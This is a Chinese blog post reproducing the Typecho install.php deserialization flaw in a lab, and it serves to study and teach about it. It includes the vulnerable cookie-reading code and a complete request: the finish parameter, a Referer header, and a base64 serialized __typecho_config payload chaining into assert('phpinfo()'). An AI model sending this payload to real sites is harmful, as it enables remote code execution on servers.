typecho反序列化漏洞复现

已于 2024-06-23 17:40:15 修改
阅读量1.8w 收藏 6
点赞数 4
分类专栏: 漏洞复现 文章标签: 安全漏洞 web安全 网络安全 安全
于 2021-07-20 19:46:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyuxiang946/article/details/118942195
版权

 「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

typecho框架存在反序列化漏洞,利用此漏洞可执行任意代码

环境搭建

第一步

 第二步

 第三步

 第三步

 第四步

 第五步

 第六步

 第七步

 第八步

 第九步

 漏洞分析

typecho\build\install.php 文件中 , 使用unserialize()进行反序列化 , 并使用base64进行编码 , 序列化的内容通过 Typech_Cookie 的 get()函数获取

 ypecho_Cookie的get函数从cookie或者post中获取参数

public static function get($key, $default = NULL)
{
    $key = self::$_prefix . $key;
    $value = isset($_COOKIE[$key]) ? $_COOKIE[$key] : (isset($_POST[$key]) ? $_POST[$key] : $default);
    return is_array($value) ? $default : $value;
}

但执行这些代码前,需要先满足两个条件

漏洞复现

第一步

 第二步

 使用抓包工具( 此处使用Burp Suite工具 )构造恶意参数

 如果Burp Suite里直接编写post请求不生效,可配合火狐浏览器的插件HacKBar

 payload

finish参数

http://192.168.232.130/typecho/build/install.php?finish=1

Referer

Referer: http://192.168.232.130

Post请求参数内容

__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUxMTc5NTIwMTtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=

士别三日wyx
关注
专栏目录
反序列化漏洞复现typecho
m0_56578216的博客
09-05 1009
将下面这段代码复制到一个php文件,命名为typecho_1.0-14.10.10_unserialize_phpinfo.php,代码中定义的类名与typecho中的类相同,是它能识别的类: 将文件放到虚拟机C:\phpstudy_2016\WWW\unserialize的目录下,打开后可以获得它的base64编码:在typecho主页用hackbar进行代码注入,注入成功就说明此处存在RCE漏洞:注入成功(说明此处存在RCE漏洞,也可以尝试getshell),回显出phpinfo界面:同上,将这段利用代
记一次typecho反序列化漏洞复现(第一次写poc版)
m0_62100902的博客
06-28 2060
经过一系列的代码审计,终于找到一个可以利用的点,其余的属性全都是写死了的,也就是静态this的调用方式,而这里不是静态的,它可以是别的对象里面去调用这个属性,那么我们可以想到一种魔术方法:__get(),这个魔术方法是当对象中调用不存在的属性时候会自动去调用这个魔术方法,那么我们需要去找到一个既有__get()魔术方法的又没有screenName这个属性的对象(这里终于来点感觉了),继续在代码审计工具里面找__get()说一说我的个人理解吧。举个例子,php与java之间是如何相互传输的呢?
Typecho 漏洞复现
Galaxy_fan的博客
07-23 2153
0x01漏洞复现 找到有漏洞的版本下载,安装成功后显示如下 payload: __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9...
typecho和emlog/typecho漏洞-新手网络安全入门教程
最新发布
程序员六七的博客
06-25 260
BugKu-PAR-渗透测试2注:这是在做完靶场几天后做的wp,环境都已经没有了,只能纯靠文字讲述,但基本思路都写出来了
Typecho代码审计-反序列化漏洞复现(超详细!!!)
小小小屿屿屿的博客
12-27 2539
本文以Typecho为靶场,通过代码审计,复现反序列化漏洞
漏洞复现篇——Typecho反序列化漏洞
爱国小白帽
03-03 5204
实验环境: PHPstudy 火狐浏览器 Typecho 填好数据库密码和你的登录密码就可以了 安装时会报错,因为无法自动创建数据库,需要使用CREATE DATABASE typecho default charset utf8;语句手动创建数据库 ...
CVE-2018-18753 Typecho 反序列化漏洞 分析复现
2301_77512689的博客
04-21 438
漏洞概述:typecho 是一款非常简洁快速博客 CMS,前台 install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任意 PHP 代码。影响版本:typecho1.0(14.10.10)
Typecho CMS 反序列化漏洞(CVE-2018-18753)复现
玄道的网安博客
12-21 3218
简介 Typecho原本是一款博客系统,其框架体系有别于市面上一般意义MVC框架,主体代码以自创的Widget为基类,整体非常简洁 漏洞概述 typecho 是博客CMS,前台install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任意PHP 代码。 影响版本 typecho1.0(14.10.10) 环境搭建 下载typecho14.10.10 https://github.com/typecho/typecho/tags 按照顺序...
typecho_14.10.10反序列化漏洞复现
acdcccc的博客
09-05 128
typecho_14.10.10反序列化漏洞复现
typecho反序列化漏洞
cxrpty的博客
03-02 738
Typecho是一个简单,轻巧的博客程序。基于PHP,使用多种数据库(Mysql,PostgreSQL,SQLite)储存数据。在GPL Version 2许可证下发行,是一个开源的程序,目前使用SVN来做版本管理。 实验环境:php5.4 实验步骤: 1.漏洞形成的原因 2.由于对finish参数、请求头HTTP_HOST及post_typecho_config数据进行验证,所以...
typecho反序列化漏洞(详细过程)
qq_61991235的博客
03-13 1799
typecho反序列化 菜鸡的第一条链子,酌情参考 搭建环境 利用phpstudy+phpstrom搭建环境调试(注意php版本大于5.4) 开始 漏洞起始点 前提:get方法传?finish=1,refer=http://127.0.0.1 若不设置的话exit,程序结束 详细看install.php前面部分的代码 <?php $config = unserialize(base64_decode(Typecho_Cookie::get('__typecho
CVE-2018-18753 Typecho 漏洞复现分析
OceanSJ的博客
02-17 524
找到unserialize()函数;验证_typecho_config参数可控;追踪对象$db发现了Magic方法并跟踪至敏感函数call_user_func()
Typecho反序列化导致前台 getshell 漏洞复现
weixin_30483697的博客
10-31 401
Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛。这次的漏洞通过install.php安装程序页面的反序列化函数,造成了命令执行。 影响范围:理论上这个漏洞影响Typecho 1.1(15.5.12)之前的版本 首先我还是记录一下敏感目录 http://127.0.0.1/typecho0....
Typecho反序列化漏洞寻找思路
问彡心的博客
08-01 1109
Typecho靶场一次成功的渗透思路,一定不能错过
TypechoCMS反序列化漏洞(CVE-2018-18753)
m0_57379855的博客
03-12 1367
TypechoCMS反序列化漏洞(CVE-2018-18753Typecho反序列化漏洞php-pocpython-poc Typecho反序列化漏洞 PHP版本:5.4.5nts(PHPStudy) 在数据库新建一个数据库typecho 只要传一个不存在的成员变量,就会触发_get()魔法函数 使用_get()调用applyFilter() call_user_func() 可以执行任意命令,包括写入文件 php-poc python-poc 重点函数 ...
typecho反序列化漏洞原理及复现过程
wsnbbz的博客
03-04 1704
漏洞介绍 Typecho是一个简单,轻巧的博客程序。基于PHP,使用多种数据库(Mysql,PostgreSQL,SQLite)储存数据。在GPL Version 2许可证下发行,是一个开源的程序,目前使用SVN来做版本管理 漏洞形成 由于源码的以下几行存在反序列化漏洞与逻辑绕过,形成漏洞 漏洞利用 思路: 由于install.php代码验证了finish参数,请求头HTTP_HOST,po...
Typecho反序列化漏洞分析
qq_41891666的博客
07-06 1507
0x01 环境准备 首先 git clone 到本地,然后phpstorm 打开, git reset hard 到漏洞修复之前的commit 0x02 审计 首先在install.php 开头就做出了两个判断,需要finish 参数以及refer头要是本站的值 核心漏洞处: 第一行直接反序列化Typecho_Cookie::get(’__typecho_config’),没有进行任何过滤 跟进Typecho_Cookie::get() 函数 发现此函数是用来取cookie 中的值的,但是如果对应
typecho markdown
08-16
Typecho 中使用 Markdown,你可以通过以下步骤进行设置: 1. 安装 Markdown 插件:首先,你需要安装 Typecho 的 Markdown 插件。你可以在 Typecho 的官方插件市场或开发者社区中找到适合的 Markdown 插件,然后将其下载到 Typecho 的插件目录中(一般是 `usr/plugins` 目录)。 2. 启用 Markdown 插件:在 Typecho 的后台管理界面中,进入「控制台」-「插件」页面,找到已下载的 Markdown 插件,点击「启用」按钮启用该插件。启用后,Typecho 的编辑器将切换为支持 Markdown 语法的编辑器。 3. 编辑文章使用 Markdown:现在你可以在 Typecho 的文章编辑页面中使用 Markdown 语法来编写内容了。Markdown 是一种简单、直观的文本标记语言,可以快速排版和格式化文章。 4. 预览和发布文章:在编辑过程中,你可以通过点击编辑器上方的「预览」按钮来查看 Markdown 格式的文章预览效果。当编辑完成后,点击「发布」按钮来将文章保存并发布到你的博客中。 使用 Markdown 可以方便地进行文本排版、插入链接、插入图片、添加代码块等操作,同时也可以提高写作效率。你可以参考 Markdown 的语法规则和常用标记来使用它在 Typecho 中编写博客内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值